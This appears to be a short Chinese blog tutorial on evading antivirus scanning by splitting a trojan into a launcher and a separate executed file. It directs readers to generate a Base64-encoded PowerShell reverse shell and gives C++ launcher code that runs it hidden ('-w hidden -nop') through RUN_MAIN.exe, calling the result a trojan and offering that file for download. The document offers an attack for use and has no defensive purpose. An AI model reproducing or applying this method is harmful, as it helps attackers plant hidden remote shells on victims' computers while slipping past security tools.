C++Powershell Python3 联动实现VirusTotal只查出2个
powershell
,所以会这样.大家可以自由发挥
1.准备两个文件 执行文件,被执行文件 (类似于分离免杀)
2.让执行文件调用被执行文件
注意:执行文件(
run_main.exe
)必须足够强大,作者这次使用pyinstaller的文件
预备代码:
- 这里使用反弹shell网站生成Powershell #3 Base64的编码部分
执行文件.cpp
:这里供出:
#include <stdio.h> #include <stdlib.h> int main() { system("RUN_MAIN.exe + 预备代码 + -w hidden -nop"); //这里隐藏 大家可以自己写一个run_main.exe return 0; }
PS:
- RUN_MAIN.exe下载
- 1.调试并生成exe
- 2.木马运行时请必须与RUN_MAIN.exe在同一目录
- 3.因为pyinstaller的文件无论是什么都会报毒,希望大家可以自己编写
- 1.RUN_MAIN.exe下载
- 2.每日友站
- 3.作者主页